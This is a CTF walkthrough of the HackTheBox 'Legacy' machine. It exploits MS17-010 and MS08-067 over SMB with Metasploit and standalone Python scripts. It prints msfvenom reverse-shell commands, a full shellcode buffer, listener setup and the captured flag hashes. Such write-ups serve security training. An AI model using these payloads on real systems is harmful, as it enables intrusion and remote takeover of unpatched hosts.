Metadata

Difficulty: Easy
OS: Windows
Release Date: 15 Mar, 2017

Enumeration

Nmap

We start by running nmap to discover the open ports on the machine.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ sudo nmap -sC -sV -oA nmap/initial 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 13:33 EST
Nmap scan report for 10.129.227.181
Host is up (0.11s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:96:2e:83 (VMware)
|_clock-skew: mean: 5d00h57m39s, deviation: 1h24m50s, median: 4d23h57m39s
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2024-02-19T22:31:36+02:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.78 seconds

From the Nmap scan, we discovered that SMB is running on a Windows XP host. As this is an old operating system, the chances of it being vulnerable are high.

Before we start looking for the vulnerability, it is worth starting another nmap scan in the background to look for open UDP ports, so that no time is lost if we end up chasing a rabbit hole. The following command looks for open UDP ports:

nmap -sU -p- --min-rate 10000 -oA nmap/udpscan 10.129.227.181

Port 139,445/TCP - SMB

Running smbmap to see what we can access without credentials.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ smbmap -H 10.129.227.181     
...
 ------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
[!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 970
...

Access was denied. We can confirm the same behavior with smbclient:

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ smbclient -N -L //10.129.227.181
session setup failed: NT_STATUS_INVALID_PARAMETER

Nmap Scripting Engine (NSE) scripts can be used to look for vulnerabilities on the server. The following command can be utilized to look for SMB vulnerabilities on port 445:

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ sudo nmap --script smb-vuln* -p 445 -oA nmap/smb_vulns 10.129.227.181
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-14 14:10 EST
Nmap scan report for 10.129.227.181
Host is up (0.10s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

Nmap done: 1 IP address (1 host up) scanned in 5.93 seconds

From the scan result, we can see that this machine is vulnerable to two well-known SMB vulnerabilities: MS17-010 and MS08-067.
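When the smb-vuln* output is long, or you are scanning more than one host, it helps to turn the host-script section into a triage list instead of reading it by eye. The following is an added example (not part of the original writeup, and not an nmap feature): it groups the "|"-prefixed NSE lines by script name, reports which smb-vuln-* checks came back VULNERABLE, flags the one that errored (smb-vuln-ms10-061 above) as needing a re-run rather than being treated as clean, and notes that message signing is disabled. The sample input is constructed from the scan output above; the Finding class and status names are my own.

```python
"""Triage the host-script section of nmap's normal output for SMB findings.

Added example (not part of the original writeup): groups the '|'-prefixed
NSE lines by script name, reports which smb-vuln-* checks came back
VULNERABLE, which failed to run (so they need a re-check rather than a
'clean' verdict), and whether SMB message signing is enforced.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: host-script lines from the two nmap runs above,
# trimmed to what the parser needs.
SAMPLE_NMAP_OUTPUT = """\
Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   Computer name: legacy
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
"""

# A script's first line is "| name: rest" or "|_name: rest"; continuation
# lines are indented after the '|' and therefore do not match this pattern.
SCRIPT_START = re.compile(r"^\|[ _]([A-Za-z0-9-]+):\s*(.*)$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class Finding:
    script: str
    status: str            # VULNERABLE, NOT_VULNERABLE, ERROR, WEAK, INFO or UNKNOWN
    cves: list = field(default_factory=list)
    detail: str = ""


def split_host_scripts(text):
    """Group the NSE output into an ordered {script_name: [lines]} mapping."""
    scripts, current = {}, None
    for line in text.splitlines():
        if not line.startswith("|"):
            continue
        m = SCRIPT_START.match(line)
        if m:
            current = m.group(1)
            scripts[current] = [m.group(2).strip()]
        elif current is not None:
            scripts[current].append(line[1:].strip())
    return scripts


def classify(name, lines):
    """Turn one script's lines into a Finding (None for scripts we do not triage)."""
    head, body = lines[0], "\n".join(lines)
    cves = sorted(set(CVE_RE.findall(body)))
    if name.startswith("smb-vuln-"):
        state = re.search(r"State:\s*([A-Z() ]+)", body)
        state = state.group(1).strip() if state else ""
        if head.startswith("ERROR"):
            return Finding(name, "ERROR", cves, head)   # re-run it; do not mark clean
        if head.lower() == "false" or state.startswith("NOT"):
            return Finding(name, "NOT_VULNERABLE", cves)
        if state.startswith(("VULNERABLE", "LIKELY")):
            return Finding(name, "VULNERABLE", cves, state)
        return Finding(name, "UNKNOWN", cves, head)
    if name == "smb-security-mode":
        m = re.search(r"message_signing:\s*(\w+)", body)
        signing = m.group(1) if m else "unknown"
        # Only 'required' protects against relay and tampering; 'disabled'
        # (the XP default seen above) and 'supported' are both weak.
        status = "INFO" if signing == "required" else "WEAK"
        return Finding(name, status, [], f"message_signing={signing}")
    if name == "smb-os-discovery":
        m = re.search(r"\bOS:\s*(.+)", body)
        return Finding(name, "INFO", [], f"OS={m.group(1).strip()}" if m else "")
    return None


def triage(text):
    """Findings ordered so that confirmed vulnerabilities come first."""
    order = {"VULNERABLE": 0, "WEAK": 1, "ERROR": 2, "UNKNOWN": 3, "NOT_VULNERABLE": 4, "INFO": 5}
    findings = [classify(n, ls) for n, ls in split_host_scripts(text).items()]
    return sorted((f for f in findings if f), key=lambda f: order[f.status])


def vulnerable_cves(text):
    """Sorted, de-duplicated CVE ids from every VULNERABLE finding."""
    return sorted({c for f in triage(text) if f.status == "VULNERABLE" for c in f.cves})


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"{f.status:<15} {f.script:<22} {' '.join(f.cves)} {f.detail}")
```

Feed it the .nmap file written by -oA and the two confirmed findings (CVE-2017-0143 and CVE-2008-4250) come out on top, followed by the disabled-signing note and the errored script; treating an ERROR as "not vulnerable" is the mistake this ordering is meant to prevent.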

Running searchsploit against both exploits:

searchsploit ms17-010
searchsploit ms08-067

From the results, the Metasploit modules and the standalone Python exploits used in the following sections look promising.

Exploitation

ms17-010

Running the discovered Metasploit module after setting the necessary options opens an administrative (SYSTEM) Meterpreter shell on the vulnerable machine.

msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.104:4444 
[*] 10.129.227.181:445 - Target OS: Windows 5.1
[*] 10.129.227.181:445 - Filling barrel with fish... done
[*] 10.129.227.181:445 - <------------- | Entering Danger Zone | ------------->
[*] 10.129.227.181:445 -        [*] Preparing dynamite...
[*] 10.129.227.181:445 -                [*] Trying stick 1 (x86)...Boom!
[*] 10.129.227.181:445 -        [+] Successfully Leaked Transaction!
[*] 10.129.227.181:445 -        [+] Successfully caught Fish-in-a-barrel
[*] 10.129.227.181:445 - <------------- | Leaving Danger Zone | ------------->
[*] 10.129.227.181:445 - Reading from CONNECTION struct at: 0x86460660
[*] 10.129.227.181:445 - Built a write-what-where primitive...
[+] 10.129.227.181:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.129.227.181:445 - Selecting native target
[*] 10.129.227.181:445 - Uploading payload... slaLJsVT.exe
[*] 10.129.227.181:445 - Created \slaLJsVT.exe...
[+] 10.129.227.181:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] 10.129.227.181:445 - Deleting \slaLJsVT.exe...
[*] Meterpreter session 1 opened (10.10.14.104:4444 -> 10.129.227.181:1055) at 2024-02-14 16:30:31 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Manual Exploitation (Without Metasploit)

You will find many public repositories for MS17-010, but only a few of the exploits work against Windows XP. We will be using the send_and_execute.py exploit from helviojunior's MS17-010 repo.

We will use msfvenom to generate a payload with the following command:

┌──(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.104 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o legacy_exploit.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: legacy_exploit.exe

We will set up a listener to receive a connection on port 443 using netcat.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...

Running the send_and_execute.py exploit against the machine:

┌──(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ python2 send_and_execute.py 10.129.227.181 legacy_exploit.exe
Traceback (most recent call last):
  File "send_and_execute.py", line 2, in <module>
    from impacket import smb, smbconnection
ImportError: No module named impacket

We have one more hurdle to cross at this point. The latest version of Kali ships impacket for Python 3, but this script needs impacket for Python 2. The simple solution is a virtualenv.

Troubleshooting
  • Install virtualenv for Python 2:
pip2 install virtualenv
  • Create a separate environment for impacket:
/home/kali/.local/bin/virtualenv --python=/usr/bin/python2 impacket-venv
  • Activate the new virtual environment:
source impacket-venv/bin/activate
  • Install an older version of impacket to avoid dependency issues with dsinternals:
pip install impacket==0.9.22

After running the troubleshooting steps, the exploit should run smoothly. Running send_and_execute.py once again:

┌──(impacket-venv)─(kali㉿kali)-[~/Exploits/Windows/MS17-010]
└─$ python2 send_and_execute.py 10.129.227.181 legacy_exploit.exe
Trying to connect to 10.129.227.181:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x860b5da8
SESSION: 0xe116a9d0
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe121ab50
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe121abf0
overwriting token UserAndGroups
Sending file HINCZ4.exe...
Opening SVCManager on 10.129.227.181.....
Creating service RNxd.....
Starting service RNxd.....
The NETBIOS connection with the remote host timed out.
Removing service RNxd.....
ServiceExec Error on: 10.129.227.181
nca_s_proto_error
Done

Despite the NETBIOS timeout and nca_s_proto_error printed by the script, the payload executed successfully on the machine and the connection was received by the netcat listener.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.227.181] 1073
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

ms08-067

Running the discovered Metasploit module after setting the necessary options opens an administrative (SYSTEM) Meterpreter shell.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.129.227.181
RHOSTS => 10.129.227.181
msf6 exploit(windows/smb/ms08_067_netapi) > set LHOST tun0
LHOST => tun0
msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.104:4444 
[*] 10.129.227.181:445 - Automatically detecting the target...
[*] 10.129.227.181:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.129.227.181:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.129.227.181:445 - Attempting to trigger the vulnerability...
[*] Sending stage (175686 bytes) to 10.129.227.181
[*] Meterpreter session 1 opened (10.10.14.104:4444 -> 10.129.227.181:1056) at 2024-02-14 16:40:11 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

Manual Exploitation (Without Metasploit)

For this purpose, we will be using ms08-067.py exploit from jivoi's pentest repo.

The script includes instructions for generating shellcode with msfvenom. We can use the following command (the -b option lists the byte values the encoded payload must not contain):

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.104 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 12 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes
unsigned char buf[] = 
"\x29\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x32\x82\x69\xc2\x83\xee\xfc\xe2\xf4\xce\x6a\xeb\xc2"
"\x32\x82\x09\x4b\xd7\xb3\xa9\xa6\xb9\xd2\x59\x49\x60\x8e"
"\xe2\x90\x26\x09\x1b\xea\x3d\x35\x23\xe4\x03\x7d\xc5\xfe"
"\x53\xfe\x6b\xee\x12\x43\xa6\xcf\x33\x45\x8b\x30\x60\xd5"
"\xe2\x90\x22\x09\x23\xfe\xb9\xce\x78\xba\xd1\xca\x68\x13"
"\x63\x09\x30\xe2\x33\x51\xe2\x8b\x2a\x61\x53\x8b\xb9\xb6"
"\xe2\xc3\xe4\xb3\x96\x6e\xf3\x4d\x64\xc3\xf5\xba\x89\xb7"
"\xc4\x81\x14\x3a\x09\xff\x4d\xb7\xd6\xda\xe2\x9a\x16\x83"
"\xba\xa4\xb9\x8e\x22\x49\x6a\x9e\x68\x11\xb9\x86\xe2\xc3"
"\xe2\x0b\x2d\xe6\x16\xd9\x32\xa3\x6b\xd8\x38\x3d\xd2\xdd"
"\x36\x98\xb9\x90\x82\x4f\x6f\xea\x5a\xf0\x32\x82\x01\xb5"
"\x41\xb0\x36\x96\x5a\xce\x1e\xe4\x35\x7d\xbc\x7a\xa2\x83"
"\x69\xc2\x1b\x46\x3d\x92\x5a\xab\xe9\xa9\x32\x7d\xbc\x92"
"\x62\xd2\x39\x82\x62\xc2\x39\xaa\xd8\x8d\xb6\x22\xcd\x57"
"\xfe\xa8\x37\xea\x63\xc8\x3c\xea\x01\xc0\x32\x83\xd2\x4b"
"\xd4\xe8\x79\x94\x65\xea\xf0\x67\x46\xe3\x96\x17\xb7\x42"
"\x1d\xce\xcd\xcc\x61\xb7\xde\xea\x99\x77\x90\xd4\x96\x17"
"\x5a\xe1\x04\xa6\x32\x0b\x8a\x95\x65\xd5\x58\x34\x58\x90"
"\x30\x94\xd0\x7f\x0f\x05\x76\xa6\x55\xc3\x33\x0f\x2d\xe6"
"\x22\x44\x69\x86\x66\xd2\x3f\x94\x64\xc4\x3f\x8c\x64\xd4"
"\x3a\x94\x5a\xfb\xa5\xfd\xb4\x7d\xbc\x4b\xd2\xcc\x3f\x84"
"\xcd\xb2\x01\xca\xb5\x9f\x09\x3d\xe7\x39\x89\xdf\x18\x88"
"\x01\x64\xa7\x3f\xf4\x3d\xe7\xbe\x6f\xbe\x38\x02\x92\x22"
"\x47\x87\xd2\x85\x21\xf0\x06\xa8\x32\xd1\x96\x17";

Replace the generated shellcode in the Python exploit.
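The msfvenom run above shows why the -b list matters: generic/none was rejected because the raw payload has a 0x00 at index 3, and only call4_dword_xor produced a buffer free of the excluded bytes. Before pasting a buffer into the script it is worth checking it mechanically. The following is an added example (not part of the original writeup or of the exploit): it decodes the C string literals that msfvenom -f c prints, confirms the byte count matches the reported "Payload size", and verifies that none of the bytes passed to -b survived encoding. The two sample outputs are constructed stand-ins, not the real payload, and the function names are my own.

```python
"""Check msfvenom's '-f c' output before pasting it into an exploit script.

Added example (not part of the original writeup): decodes the C string
literals msfvenom prints, confirms the byte count matches the reported
'Payload size', and verifies that none of the bytes excluded with -b
survived encoding.  The samples below are constructed stand-ins.
"""
import re

# The -b list from the msfvenom command above, as raw byte values.
BAD_CHARS = bytes([0x00, 0x0a, 0x0d, 0x5c, 0x5f, 0x2f, 0x2e, 0x40])

# Constructed: a clean buffer whose bytes avoid every excluded value.
CLEAN_OUTPUT = r"""
Payload size: 6 bytes
Final size of c file: 60 bytes
unsigned char buf[] =
"\x29\xc9\x83"
"\xe9\xaf\xe8";
"""

# Constructed: a buffer with a NUL at index 3 (the failure generic/none
# reported above) and a 0x2f at index 4.
TAINTED_OUTPUT = r"""
Payload size: 5 bytes
unsigned char buf[] =
"\x31\xc0\x50\x00\x2f";
"""

# One C string literal made only of \xNN escapes.
C_STRING_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')


def parse_c_buffer(text):
    """Concatenate every "\\x.." string literal and decode it to bytes."""
    hex_pairs = "".join(C_STRING_RE.findall(text)).replace("\\x", "")
    return bytes.fromhex(hex_pairs)


def declared_size(text):
    """The 'Payload size: N bytes' value msfvenom prints, or None."""
    m = re.search(r"Payload size:\s*(\d+)\s*bytes", text)
    return int(m.group(1)) if m else None


def check_payload(text, bad_chars=BAD_CHARS):
    """Return a report: decoded length, list of problems, and an overall ok flag."""
    buf = parse_c_buffer(text)
    problems = []
    size = declared_size(text)
    if size is not None and size != len(buf):
        problems.append(f"declared size {size} != parsed {len(buf)} bytes")
    for index, value in enumerate(buf):
        if value in bad_chars:
            problems.append(f"bad character (index={index}, char=0x{value:02x})")
    return {"length": len(buf), "problems": problems, "ok": not problems}


if __name__ == "__main__":
    for label, sample in (("clean", CLEAN_OUTPUT), ("tainted", TAINTED_OUTPUT)):
        print(label, check_payload(sample))
```

A mismatch between the declared size and the decoded length usually means a line was lost while copying the buffer; a bad-character hit means the encoder the run settled on did not honour the -b list and the payload needs to be regenerated.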

At this point, start a listener on port 443 using netcat.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...

Running the ms08-067.py exploit against the machine:

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py                                              
Install the following library to make this script work
Impacket : https://github.com/CoreSecurity/impacket.git
PyCrypto : https://pypi.python.org/pypi/pycrypto

This looks like the same issue we encountered during the manual exploitation of MS17-010. Following the same virtualenv steps and running the Python script again:

┌──(impacket-venv)─(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py         
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer
#   - Added support for selecting a target port at the command line.
#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode.
#######################################################################


$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .


#######################################################################


Usage: ms08-067.py <target ip> <os #> <Port #>

Example: MS08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: MS08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: MS08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
Example: MS08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
Example: MS08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
Example: MS08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
Example: MS08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

FYI: nmap has a good OS discovery script that pairs well with this exploit:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1

The exploit requires us to know the Windows version and language pack. From the initial enumeration, we know the version is Windows XP. From the examples, target 6 (Windows XP SP3 English (NX)) looks promising.

Running the ms08-067.py exploit once again with the necessary arguments:

┌──(impacket-venv)─(kali㉿kali)-[~/HackTheBox/machines/Legacy/exploits]
└─$ python2 ms08-067.py 10.129.227.181 6 445
#######################################################################
#   MS08-067 Exploit
#   This is a modified verion of Debasis Mohanty's code (https://www.exploit-db.com/exploits/7132/).
#   The return addresses and the ROP parts are ported from metasploit module exploit/windows/smb/ms08_067_netapi
#
#   Mod in 2018 by Andy Acer
#   - Added support for selecting a target port at the command line.
#   - Changed library calls to allow for establishing a NetBIOS session for SMB transport
#   - Changed shellcode handling to allow for variable length shellcode.
#######################################################################


$   This version requires the Python Impacket library version to 0_9_17 or newer.
$
$   Here's how to upgrade if necessary:
$
$   git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
$   cd impacket
$   pip install .


#######################################################################

Windows XP SP3 English (NX)

[-]Initiating connection
[-]connected to ncacn_np:10.129.227.181[\pipe\browser]
Exploit finish

The payload executed successfully on the machine and the connection was received by the netcat listener.

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.104] from (UNKNOWN) [10.129.227.181] 1076
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>

whoami

The target doesn't have a whoami binary. Several useful Windows binaries ship by default with Kali:

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ locate whoami.exe   
/usr/share/windows-resources/binaries/whoami.exe

The following command can be used to share the binaries folder over SMB:

┌──(kali㉿kali)-[~/HackTheBox/machines/Legacy]
└─$ impacket-smbserver webhackery /usr/share/windows-resources/binaries/
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Running whoami.exe from the share on the target to confirm SYSTEM-level access:

C:\WINDOWS\system32>\\10.10.14.104\webhackery\whoami.exe
\\10.10.14.104\webhackery\whoami.exe
NT AUTHORITY\SYSTEM

Proof

user.txt

C:\Documents and Settings\john\Desktop>dir && hostname && type user.txt && ipconfig
dir && hostname && type user.txt && ipconfig
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\john\Desktop

16/03/2017  08:19     <DIR>          .
16/03/2017  08:19     <DIR>          ..
16/03/2017  08:19                 32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.400.086.016 bytes free
legacy
e69af0e4f443de7e36876fda4ec7644f
Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : .htb
        IP Address. . . . . . . . . . . . : 10.129.227.181
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . : 10.129.0.1

C:\Documents and Settings\john\Desktop>

root.txt

C:\Documents and Settings\Administrator\Desktop>dir && hostname && type root.txt && ipconfig        
dir && hostname && type root.txt && ipconfig
 Volume in drive C has no label.
 Volume Serial Number is 54BF-723B

 Directory of C:\Documents and Settings\Administrator\Desktop

16/03/2017  08:18     <DIR>          .
16/03/2017  08:18     <DIR>          ..
16/03/2017  08:18                 32 root.txt
               1 File(s)             32 bytes
               2 Dir(s)   6.400.073.728 bytes free
legacy
993442d258b0e0ec917cae9e695d5713
Windows IP Configuration


Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . : .htb
        IP Address. . . . . . . . . . . . : 10.129.227.181
        Subnet Mask . . . . . . . . . . . : 255.255.0.0
        Default Gateway . . . . . . . . . : 10.129.0.1

C:\Documents and Settings\Administrator\Desktop>